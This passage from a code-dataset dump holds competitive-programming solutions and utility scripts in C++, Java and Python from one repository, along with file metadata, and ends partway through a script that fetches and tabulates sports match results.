operator|(matrix lhs, const matrix& rhs) { lhs |= rhs; return lhs; }\n friend matrix operator+(matrix lhs, const T& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const T& rhs) { lhs -= rhs; return lhs; }\n friend matrix operator*(matrix lhs, const T& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator/(matrix lhs, const T& rhs) { lhs /= rhs; return lhs; }\n friend matrix operator%(matrix lhs, const T& rhs) { lhs %= rhs; return lhs; }\n friend matrix operator^(matrix lhs, const ll& rhs) { lhs ^= rhs; return lhs; }\n matrix operator|=(const valarray<T>& rhs) { return *this |= matrix(rhs); }\n T max() { return a.max(); }\n T min() { return a.min(); }\n T sum() { return a.sum(); }\n\n matrix transpose() {\n matrix temp(m, n, 0);\n fori(n) forj(m) temp[i][j] = a[j][i];\n return temp;\n }\n\n T normalize(int index) {\n T g = 1;\n bool found = false;\n for (T& x: a[index])\n if (x != 0)\n {\n if (not found) g = x, found = true;\n else g = gcd(g, x);\n }\n a[index] /= g;\n return g;\n }\n\n void normalize() {\n fori(n) normalize(i);\n }\n\n T determinant() {\n matrix temp(*this);\n T numerator = 1;\n T denumerator = 1;\n fori(n)\n {\n int nonZero = i;\n while (nonZero < n && !temp[nonZero][i]) ++nonZero;\n if (nonZero == n) return 0;\n\n swap(temp[i], temp[nonZero]);\n numerator *= temp[i][i];\n\n FOR(j, i + 1, n)\n if (temp[j][i])\n {\n T g = gcd(temp[i][i], temp[j][i]);\n denumerator *= temp[i][i] / g;\n temp[j] = temp[j] * (temp[i][i] / g) - temp[i] * (temp[j][i] / g);\n }\n }\n writeln(temp); writeln();\n return numerator / denumerator;\n }\n\n optional<pair<T, matrix<T>>> invert() {\n assert(n == m);\n matrix temp(*this);\n temp |= matrix(n, n);\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n matrix ret(n, n, 0);\n auto s = slice(n, n, 1);\n fori(n) ret[i] = temp[i][s];\n return pair(det.value(), ret);\n }\n\n optional<pair<T, valarray<T>>> solution(const valarray<T>& b) {\n assert(n == m);\n matrix temp(*this);\n temp |= b;\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n valarray<T> ret(0, n);\n fori(n) ret[i] = temp[i][n];\n return pair(det.value(), ret);\n }\n\n friend ostream& operator<<(ostream& os, matrix rhs) {\n fori(rhs.n)\n {\n os << rhs.a[i];\n if (i != rhs.n - 1) os << \"\\n\";\n }\n return os;\n }\n friend istream& operator>>(istream& is, matrix& rhs) {\n fori(rhs.n) is >> rhs.a[i];\n return is;\n }\n\nprivate:\n valarray<valarray<T>> a;\n int n, m;\n\n static optional<T> solve(matrix& temp) {\n vector<int> permutation(temp.n);\n iota(whole(permutation), 0);\n\n auto get = [&](int i, int j) {\n return temp[permutation[i]][j];\n };\n auto findNonZero = [&](int i) {\n int nonZero = i;\n while (nonZero < temp.n && !get(nonZero, i)) ++nonZero;\n return nonZero;\n };\n fori(temp.n)\n {\n int nonZero = findNonZero(i);\n if (nonZero == temp.n) return {};\n swap(permutation[i], permutation[nonZero]);\n FOR(j, i + 1, temp.n)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n }\n ROF(i, temp.n - 1, 0)\n ROF(j, i - 1, 0)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n fori(temp.n) temp.normalize(i);\n T mx = 0;\n fori(temp.n) mx = std::max(mx, abs(get(i, i)));\n fori(temp.n) temp[permutation[i]] *= mx / get(i, i);\n matrix ret(temp.n, temp.m, 0);\n fori(temp.n) ret[i] = temp[permutation[i]];\n temp = ret;\n return mx;\n }\n};\n\n//binpowmod\ntemplate<typename T>\nT binpowmod(T a, ll n, T mod)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res = (res * a) % mod;\n a = (a * a) % mod;\n n >>= 1;\n }\n return res;\n}\n//binpow\n\ntemplate<typename T>\nT binpow(T a, ll n)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res *= a;\n a *= a;\n n >>= 1;\n }\n return res;\n}\n\n//modular\ntemplate<typename T = int, T mod = 1000000007>\nstruct modular\n{\n T value = 0;\n\n modular(){}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& t) { value = t % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { value = num * 1ll * binpowmod<ll>(den, mod - 2, mod) % mod; }\n template<typename T1> modular& operator^=(T1 const& deg) { value = binpowmod<ll>(value, deg, mod); return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value > mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return modular(*this) *= t; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; }\n};\n\n//Igorjan\n//}}}\n\ntypedef modular<int, MOD - 1> modDeg;\ntypedef modular<int, MOD> modAns;\nvoid run()\n{\n valarray<valarray<modDeg>> coeffs = {\n {1, 0, 0, 0, 0},\n {0, 4, 0, 0, 0},\n {0, 0, 1, 0, 0},\n {0, 0, 0, 1, 0},\n {0, 0, 0, 0, 1}\n };\n valarray<valarray<modDeg>> mm = {\n {1, 1, 0, 0, -6},\n {0, 1, 0, 0, 2},\n {0, 0, 0, 0, 1},\n {0, 0, 1, 0, 1},\n {0, 0, 0, 1, 1}\n };\n matrix<modDeg> m = mm;\n\n ll d;\n valarray<modAns> v(3);\n modAns c;\n readln(d, v, c);\n valarray<modDeg> x = (coeffs * (m ^ (d - 3)))[4];\n modAns ans = c ^ (x[0] + x[1]).value;\n fori(3)\n ans *= v[i] ^ x[i + 2].value;\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4413597881793976, "alphanum_fraction": 0.44702550768852234, "avg_line_length": 22.53333282470703, "blob_id": "9cac7a9fedb7377793caa7f004a4c7c1bcf947ec", "content_id": "d29b62faffb0d6b6e0584b701edc55e760b0b0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 78, "num_lines": 75, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.23/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n \npublic class B {\n int n;\n String[] a, b;\n \n int get(String f, String t) {\n if (f.equals(t)) {\n return 0;\n }\n \n int min = 16;\n for (int i = 0; i < n; i++) {\n if (f.contains(a[i])) {\n String s = f.replace(a[i], b[i]);\n if (s.length() <= t.length()) {\n min = Math.min(min, get(s, t));\n }\n }\n }\n \n return min + 1;\n }\n \n void run() {\n while (true) {\n n = nextInt();\n if (n == 0) {\n return;\n }\n \n a = new String[n];\n b = new String[n];\n \n for (int i = 0; i < n; i++) {\n a[i] = next();\n b[i] = next();\n }\n int ans = get(next(), next());\n out.println(ans > 10 ? -1 : ans);\n }\n }\n \n static StringTokenizer stringTokenizer;\n static BufferedReader bufferedReader;\n static PrintWriter out;\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n \n String next() {\n while (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n stringTokenizer = new StringTokenizer(nextLine());\n }\n return stringTokenizer.nextToken();\n }\n \n String nextLine() {\n try {\n return bufferedReader.readLine();\n } catch (IOException e) {\n return \"\";\n }\n }\n \n public static void main(String[] args) throws IOException {\n bufferedReader = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n new B().run();\n bufferedReader.close();\n out.close();\n }\n}" }, { "alpha_fraction": 0.3154296875, "alphanum_fraction": 0.35693359375, "avg_line_length": 21.755556106567383, "blob_id": "d81cfb251879ea8651850b48aea523a43bf13203", "content_id": "23f797d32e8cbe6f373c39d18905b0239441d2a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 83, "num_lines": 90, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/EWA4.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stack>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n \nusing namespace std;\n \nlong long res = 0, ost = 0;\n \nint inf = 1e+9 + 9;\n \n \nint n, cnt[1000500], ans[1000500];\nvector <int> mp[1000500], a, b;\nvector <int> bb[1000500];\nint main(){\n freopen(\"gcs.in\", \"r\", stdin);\n int n = 0;\n string s;\n getline (cin, s);\n s += ' ';\n int num = 0;\n for (int i = 0; i < s.length(); ++i){\n if (s[i] == ' '){\n a.push_back(num);\n num = 0;\n }\n else\n num = num * 10 + (s[i] - '0');\n }\n getline (cin, s);\n s += ' ';\n num = 0;\n for (int i = 0; i < s.length(); ++i){\n if (s[i] == ' '){\n b.push_back(num);\n num = 0;\n }\n else\n num = num * 10 + (s[i] - '0');\n }\n for (int i = 0; i < 1000500; ++i){\n cnt[i] = -1;\n }\n for (int i = 0; i < a.size(); ++i){\n mp[a[i]].push_back(i);\n cnt[a[i]]++;\n }\n for (int i = 0; i < b.size(); ++i){\n if (cnt[b[i]] == -1 || cnt[b[i]] >= mp[b[i]].size())\n bb[i].push_back(-1);\n else\n bb[i] = mp[b[i]];\n }\n int border = 1000500;\n ans[0] = -1 * inf;\n for (int i = 1; i < border; ++i){\n ans[i] = inf;\n }\n \n for (int i = 0; i < b.size(); ++i){\n int x = bb[i][bb[i].size() - 1];\n if (!(x + 1))\n continue;\n int r = border;\n int l = 0, m;\n while (r > l + 1){\n m = (r + l) / 2;\n if (ans[m] > x)\n r = m;\n else l = m;\n }\n ans[r] = x;\n // cout << x << \" \";\n int cnt = 1;\n while (cnt < bb[i].size() + 1 && bb[i][bb[i].size() - cnt] >= ans[r - 1] &&\n bb[i][bb[i].size() - cnt] < ans[r + 1])\n cnt++;\n cnt--;\n ans[r] = bb[i][bb[i].size() - cnt];\n }\n for (int i = 1; i < border; ++i){\n if (ans[i] == inf && i < 100){\n cout << i - 1 << '\\n';\n return 0;\n }\n }\n \n}\n" }, { "alpha_fraction": 0.2850729525089264, "alphanum_fraction": 0.3086419701576233, "avg_line_length": 23.75, "blob_id": "1c41baf60af746d9ba6e898d9fc9a4b311c3ab70", "content_id": "0d58626042a8c31642d7aeafdd3485d7670a2d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 891, "license_type": "no_license", "max_line_length": 51, "num_lines": 36, "path": "/2017/fbhcQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "t = int(input())\nfor q in range(t):\n h, n = map(int, input().split())\n ans = 0.0\n for s in input().split():\n z = 0\n a = s.split('+')\n if len(a) == 2:\n z = int(a[1])\n s = a[0]\n else:\n a = s.split('-')\n if len(a) == 2:\n z = -int(a[1])\n s = a[0]\n x, y = map(int, s.split('d'))\n\n l = x * y + 1\n res = [0] * l\n res[0] = 1\n for i in range(x):\n nex = [0] * l\n for j in range(l - y):\n if res[j] > 0:\n for k in range(1, y + 1):\n nex[j + k] += res[j]\n res = nex\n ok = sum(res)\n d = 0\n for i in range(l):\n if i + z >= h:\n d += res[i]\n ans = max(ans, d / ok)\n\n\n print(\"Case #{:d}: {:.10f}\".format(q + 1, ans))\n" }, { "alpha_fraction": 0.5021065473556519, "alphanum_fraction": 0.5234200954437256, "avg_line_length": 31.80487823486328, "blob_id": "0b057b23e22718d13156718bb2bb9fcb5cec2b7e", "content_id": "2829aed66b4363e06b1601630e697ef74f492459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4035, "license_type": "no_license", "max_line_length": 174, "num_lines": 123, "path": "/CodeForce/1305/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//sieve\nvector<bool> sieve(int n)\n{\n vector<bool> x(n, true);\n x[0] = x[1] = false;\n for (int i = 2; i < n; i++)\n if (x[i])\n for (int j = i * 2; j < n; j += i)\n x[j] = false;\n return x;\n}\n\n//}}}\n\nstatic const int N = 2000000;\nvoid run()\n{\n auto isPrime = sieve(N);\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n vector<ll> a(n);\n readln(a);\n vector<ll> b = a;\n sort(whole(b));\n b.erase(unique(whole(b)), b.end());\n shuffle(whole(a), rng);\n shuffle(whole(b), rng);\n vector<ll> c;\n b.resize(30);\n auto add = [&](ll x) {\n if (x >= N || isPrime[x])\n c.pb(x);\n };\n for (ll& X: b)\n FOR(i, -1, 2)\n if (ll x = X + i; x > 1)\n {\n for (ll k = 1; k * k <= x; k++)\n if (x % k == 0)\n add(k),\n add(x / k);\n }\n sort(whole(c));\n c.erase(unique(whole(c)), c.end());\n\n ll ans = n + 2;\n for (ll& x: c)\n if (x > 1)\n {\n ll cnt = 0;\n for (int i = 0; i < n && cnt < ans; ++i)\n if (a[i] <= x)\n cnt += x - a[i];\n else\n {\n ll temp = a[i] % x;\n cnt += min(temp, x - temp);\n }\n ans = min(ans, cnt);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5621445775032043, "alphanum_fraction": 0.5702680945396423, "avg_line_length": 27.298851013183594, "blob_id": "33e20efe3e4c867d00292dd32d44ec01d73fa768", "content_id": "93354b7423540c6a5793578718432ab3ffc64d2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "no_license", "max_line_length": 94, "num_lines": 87, "path": "/staff/main.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nif 'PyPy' in sys.version: # {{{\n from _continuation import continulet\nelse:\n import threading\nfrom io import BytesIO, IOBase\n\nBUFSIZE = 8192\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self):\n while self.newlines == 0:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n os.write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\n\nsys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\ninput = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\n# }}}\n\ndef read():\n return list(map(int, input().split()))\n\ndef main():\n [n] = read()\n a = read()\n print(*sorted(a))\n\nif __name__ == '__main__': # {{{\n if 'PyPy' in sys.version:\n\n def bootstrap(cont):\n call, arg = cont.switch()\n while True:\n call, arg = cont.switch(to=continulet(lambda _, f, args: f(*args), call, arg))\n\n cont = continulet(bootstrap)\n cont.switch()\n\n main()\n\n else:\n sys.setrecursionlimit(1 << 30)\n threading.stack_size(1 << 27)\n\n main_thread = threading.Thread(target=main)\n main_thread.start()\n main_thread.join() # }}}\n" }, { "alpha_fraction": 0.4815465807914734, "alphanum_fraction": 0.4920913875102997, "avg_line_length": 19.321428298950195, "blob_id": "7b46a6688bc772a89aba50145573f57fc3d3548a", "content_id": "2f37635f037c805b3dd98b93b422d75b03997678", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 569, "license_type": "no_license", "max_line_length": 45, "num_lines": 28, "path": "/wordsLetters/words.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport collections\nimport re\n\ndef get(s):\n m = collections.defaultdict(lambda: 0)\n for c in re.sub(f'[^\\w]', '', s.lower()):\n m[c] += 1\n return m\n\ndef output(f):\n for k in sorted(f.keys()):\n if f[k] != 0:\n print(k, f[k])\n print(\"==========================\")\n\ndef sub(f, t):\n ans = collections.defaultdict(lambda: 0)\n for k in f:\n ans[k] = f[k]\n for k in t:\n ans[k] -= t[k]\n return ans\n\nd = get(open(\"./dict.txt\").readline()[:-1])\noutput(d)\nfor s in sys.stdin:\n output(sub(d, get(s[:-1])))\n" }, { "alpha_fraction": 0.4577777683734894, "alphanum_fraction": 0.47555556893348694, "avg_line_length": 13, "blob_id": "7a78721bc614796afad721f0a0bd88bed3dba303", "content_id": "1045e111764465563b78db18e89338b46f84f65f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 225, "license_type": "no_license", "max_line_length": 32, "num_lines": 15, "path": "/trains/ai/cpp-cgdk/new/cpp-cgdk/model/CarType.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#ifndef _CAR_TYPE_H_\r\n#define _CAR_TYPE_H_\r\n\r\nnamespace model {\r\n enum CarType {\r\n _UNKNOWN_CAR_TYPE_ = -1,\r\n BUGGY = 0,\r\n JEEP = 1,\r\n _CAR_TYPE_COUNT_ = 2\r\n };\r\n}\r\n\r\n#endif\r\n" }, { "alpha_fraction": 0.44524794816970825, "alphanum_fraction": 0.4655647277832031, "avg_line_length": 28.632652282714844, "blob_id": "55208c694d8db1ccb4fde518460cb78462d6ddde", "content_id": "de9ce690f773ee413090ad7e88c33de923c7e5a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2904, "license_type": "no_license", "max_line_length": 928, "num_lines": 98, "path": "/2013/2013FBHC/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll unsigned long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nint d1 = 0, d2 = 0;\nll s1 = 0, s2 = 0, mx, sum1 = 0, sum2 = 0;\nvector< vi > a;\nvector<ll> r;\nint fl = 0;\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n cout << (f[i] != 0 ? f[i] : (mx - r[i])) << (i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid readln(vector<int> &f, int n, int z)\n{\n int x;\n forn(i, n)\n {\n read(x);\n f.push_back(x);\n r[i] += x;\n if (i == z)\n s1 += x;\n if (i == n - z - 1)\n s2 += x;\n if (x == 0)\n {\n if (i == z)\n d1++;\n if (i == n - z - 1)\n d2++;\n }\n }\n if (z == n - z - 1)\n fl = 1;\n}\n\nvoid run()\n{\n int n;\n readln(n);\n a.resize(n);\n r.resize(n, 0);\n forn(i, n)\n readln(a[i], n, i);\n mx = *max_element(r.begin(), r.end());\n ll ss1 = 0, ss2 = 0;\n forn(i, n)\n {\n if (a[i][i] == 0)\n ss1 += mx - r[i];\n if (a[i][n - i - 1] == 0)\n ss2 += mx - r[n - i - 1];\n }\n mx = max(s1 + ss1, max(mx, s2 + ss2));\n if (d1 == 0)\n mx = s1;\n else\n if (d2 == 0)\n mx = s2;\n else\n mx++;\n forn(i, n)\n writeln(a[i]);\n}\n\nint main()\n{\n freopen(\"e.in\", \"r\", stdin);\n freopen(\"e.out\", \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.5087719559669495, "avg_line_length": 16, "blob_id": "9fcbfee7306b39561878d695ca6bcad4d0c4cabe", "content_id": "ad11327998995e84ef417d40a13e752af23ebb59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 57, "license_type": "no_license", "max_line_length": 26, "num_lines": 3, "path": "/CodeForce/0409/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " PROGRAM hello\n PRINT*, 'FORTRAN 77'\n END\n" }, { "alpha_fraction": 0.5584642291069031, "alphanum_fraction": 0.5778796076774597, "avg_line_length": 39.1929817199707, "blob_id": "fc8ef39216d313d2132395601e80d8a4a4eb26e7", "content_id": "a360c755533fb1e9aba0fa9365ce14c630b3a86e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4847, "license_type": "no_license", "max_line_length": 250, "num_lines": 114, "path": "/scripts/parseChampionatDotCom", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport json\nimport subprocess\nimport requests\nimport math\nimport datetime\nimport time\nimport terminaltables\nimport re\nfrom argparse import ArgumentParser, ArgumentTypeError\n\ndef matcher(s, pat=re.compile(r'^\\d\\d\\d\\d-\\d\\d-\\d\\d$')):\n if not pat.match(s):\n raise ArgumentTypeError('Expected date in format \"yyyy-MM-dd\"')\n return s\n\ndef getArgs():\n parser = ArgumentParser()\n parser.add_argument('-m', '--tomorrow', dest='tomorrow', action='count', help='load results for tomorrow')\n parser.add_argument('-y', '--yesterday', dest='yesterday', action='count', help='load results for yesterday')\n parser.add_argument('-d', '--date', dest='date', type=matcher, help='load results for date=DATE')\n args = parser.parse_args()\n today = datetime.datetime.today() - datetime.timedelta(hours = 3)\n\n if not args.date:\n args.date = today.strftime(\"%Y-%m-%d\")\n if args.tomorrow:\n args.date = (today + datetime.timedelta(days = args.tomorrow)).strftime(\"%Y-%m-%d\")\n if args.yesterday:\n args.date = (today + datetime.timedelta(days = -args.yesterday)).strftime(\"%Y-%m-%d\")\n print(args.date)\n return args.date\n\ncolors = {\n 'GREEN': '\\033[92m',\n 'YELLOW': '\\033[93m',\n 'RED': '\\033[91m',\n 'ENDC': '\\033[0m',\n 'BOLD': '\\033[1m',\n}\n\ndef setColor(color, s):\n return colors[color.upper()] + s + colors['ENDC']\n\nurl = 'https://www.championat.com/stat/{}.json?_={}'.format(getArgs(), str(math.floor(time.time() * 1000)))\ns = subprocess.check_output([\"curl\", url], stderr = open(os.devnull, 'w'))\nactions = json.loads(s)['matches']\n# actions = requests.get(url).json()['matches']\n# actions = requests.get('https://www.championat.com/stat/2018-10-06.json?_=' + str(math.floor(time.time() * 1000))).json()\n# actions = requests.get('https://www.championat.com/live/live/?_=' + str(math.floor(time.time() * 1000))).json()\nnames = ['МИР Российская Премьер-лига', 'Россия - Премьер-Лига', 'Суперкубок России', 'Лига чемпионов', 'Кубок России', 'Товарищеские матчи (сборные)', 'Лига наций УЕФА', 'Суперкубок УЕФА', 'Лига Европы', 'КХЛ', 'ЧМ', 'ЧЕ', 'Еврохоккейтур', 'Кубок мира', 'Россия - Переходные матчи']\n\ndatas = [ ('Хоккей', 'hockey'), ('Футбол', 'football'), ('Биатлон', 'biathlon') ]\n\ndef boldTeam(team, name):\n if name[:4] == 'Лига':\n return team in ['Зенит', 'Локомотив М', 'Краснодар', 'Ростов', 'ЦСКА', 'Спартак М', 'Оренбург', 'Рубин', 'Урал', 'Ахмат', 'Динамо М', 'СКА', 'Россия']\n return team in ['Зенит', 'СКА', 'Россия']\n\ndef printTour(temp, name):\n table = []\n for match in temp['matches']:\n if 'result' not in match or 'detailed' not in match['result']:\n 